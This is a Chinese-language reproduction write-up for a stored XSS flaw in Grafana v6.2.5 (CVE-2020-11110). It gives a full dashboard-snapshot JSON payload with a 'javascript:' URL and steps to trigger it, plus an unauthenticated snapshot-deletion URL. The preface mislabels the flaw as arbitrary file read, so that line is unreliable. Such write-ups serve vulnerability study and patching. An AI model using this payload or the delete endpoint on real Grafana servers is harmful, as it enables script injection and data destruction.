Grafana 存储型XSS漏洞(CVE-2020-11110)
本文转自starnight_cyber 并作补充
Preface
Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
1
2
3
4
5
6 CVE编号:
CVE-2020-11110
影响范围:
Grafana v6.2.5
Links
https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
复现记录
测试环境部署
1
2 payload =>
{"dashboard":{"annotations":{"list":[{"name":"Annotations & Alerts","enable":true,"iconColor":"rgba(0, 211, 255, 1)","type":"dashboard","builtIn":1,"hide":true}]},"editable":true,"gnetId":null,"graphTooltip":0,"id":null,"links":[],"panels":[],"schemaVersion":18,"snapshot":{"originalUrl":"javascript:alert('Revers3c')","timestamp":"2020-03-30T01:24:44.529Z"},"style":"dark","tags":[],"templating":{"list":[]},"time":{"from":null,"to":"2020-03-30T01:24:53.549Z","raw":{"from":"6h","to":"now"}},"timepicker":{"refresh_intervals":["5s","10s","30s","1m","5m","15m","30m","1h","2h","1d"],"time_options":["5m","15m","1h","6h","12h","24h","2d","7d","30d"]},"timezone":"","title":"Dashboard","uid":null,"version":0},"name":"Dashboard","expires":0}
Stored-XSS
替换 url 中的 localhost,访问快照地址,点击链接🔗图标。 Stored-XSS。
snapshot 快照删除
访问 deleteUrl:
http://103.210.xx.xx:3000/api/snapshots-delete/o3ITlrkiwgJexFmCJxr4gsNZ8QDcc0eQ
可以删除 snapshot,这里算是个严重程度更高的漏洞。
修复方案
版本升级。
Refer
https://ctf-writeup.revers3c.com/challenges/web/CVE-2020-11110/index.html
以上!